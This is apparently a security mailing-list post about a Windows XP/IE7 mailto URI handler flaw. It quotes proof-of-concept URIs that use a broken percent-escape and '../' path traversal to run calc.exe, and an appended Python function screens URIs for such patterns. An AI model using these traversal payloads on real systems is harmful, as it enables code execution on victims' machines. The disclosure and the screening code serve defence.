Dear All,

mailto:test%../../../../windows/system32/calc.exe".cmd

I would deem 1 and 3 as reasonable (intended) behaviour.

>2) now do the very same thing on a system with Windows XP and IE7.
>calc.exe is executed.

Confirmed here, that's definitely a Problem, and should be linked to the Windows URI Handler. (IMHO)

The behaviour is this:
The extension determines the handler to use to shell "../../../../windows/system32/calc.exe"

Example:
mailto:test%../../../../windows/system32/calc.exe".cmd
Uses the cmd handler to open calc (which executes)

mailto:test%../../../../windows/system32/calc.exe".txt
uses notepad and tries to open calc.

Something's definitely broken with the URI handler (imho)

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
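The two URIs in the message above share a malformed percent-escape, a literal double quote and `../` segments. As an added example (not part of the original message), here is one way an application could screen a URI before handing it to the operating system's URI handler; the function name `screen_uri`, the scheme allow-list and the choice of checks are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Characters RFC 3986 permits literally in a URI (unreserved + reserved).
_ALLOWED = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=]")
# A well-formed percent-escape is '%' followed by exactly two hex digits.
_PCT = re.compile(r"%[0-9A-Fa-f]{2}")


def screen_uri(uri, allowed_schemes=("mailto", "http", "https")):
    """Return the reasons to refuse passing `uri` to the OS URI handler.

    An empty list means the URI passed every check. (Hypothetical helper.)
    """
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in allowed_schemes:
        return ["scheme not on allow-list"]

    reasons = []
    i = 0
    while i < len(rest):
        ch = rest[i]
        if ch == "%":
            if _PCT.match(rest, i):
                i += 3          # skip the whole valid escape
                continue
            reasons.append(f"malformed percent-escape at offset {i}")
        elif not _ALLOWED.match(ch):
            reasons.append(f"illegal character {ch!r} at offset {i}")
        i += 1

    # Look for '..' path segments in the decoded form, with both separators.
    segments = unquote(rest).replace("\\", "/").split("/")
    if ".." in segments or any(s.endswith("%..") for s in segments):
        reasons.append("path traversal segment")
    return reasons


if __name__ == "__main__":
    # The two URIs from the message, plus one ordinary address (constructed).
    for u in ('mailto:test%../../../../windows/system32/calc.exe".cmd',
              'mailto:test%../../../../windows/system32/calc.exe".txt',
              "mailto:user@example.com?subject=hello%20world"):
        print(u, "->", screen_uri(u) or "ok")
```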